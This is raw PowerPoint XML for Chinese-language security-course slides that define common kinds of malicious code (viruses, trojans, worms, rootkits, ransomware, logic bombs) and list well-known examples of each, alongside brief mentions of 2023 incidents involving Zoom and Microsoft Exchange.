            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>Zoom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>视频会议软件：摄像头和麦克风被黑客控制</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2023</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>年，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Zoom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>视频会议软件曝出了安全漏洞。黑客可以通过漏洞控制用户的摄像头和麦克风，窃取用户的隐私信息，甚至在视频会议中实施网络攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>Microsoft Exchange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>服务器：邮件服务遭受史上最大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2023</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>年，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Microsoft Exchange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器遭受了史上最大的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="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恶意代码形式</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1825205" y="782249"/>
            <a:ext cx="9853295" cy="5847755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>计算机病毒（简称病毒）： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>自我复制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>感染</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>其他计算机的恶意代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CIH</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、爱虫、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>美丽莎、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>新欢乐时光、求职信、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>恶鹰</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>rose</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、威金、熊猫烧香、小浩、机器狗、磁碟机、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>终结者</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Flame…</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>木马(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Horses)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>：可以伪装成他类的程序。看起来像是正常程序，一旦被执行，将进行某些隐蔽的操作。比如一个模拟登录接口的软件，它可以捕获毫无戒心的用户的口令。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>冰河、网络神偷、灰鸽子、上兴</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>蠕虫(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 像病毒那样可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>扩散</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，但蠕虫可以自我复制，不需要借助其他宿主。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>红色代码、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>蠕虫王、冲击波、震荡波、极速波、魔波、震网</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rootkit（Root工具）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>：是攻击者用来隐藏自己的踪迹和保留root访问权限的工具</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RootKit</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Hkdef</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ByShell</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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恶意代码形式</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1825625" y="994410"/>
            <a:ext cx="9853295" cy="5203989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>勒索病毒(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: 利用各种加密算法对文件进行加密，被感染者一般无法解密，必须拿到解密的私钥才有可能破解。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>逻辑炸弹(Logic Bombs)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>：可以由某类事件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>触发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>执行，例如某一时刻(一个时间炸弹)，或者是某些运算的结果。软件执行的结果可以千差万别，从发送无害的消息到系统彻底崩溃。</a:t>
            </a:r>
          </a:p>
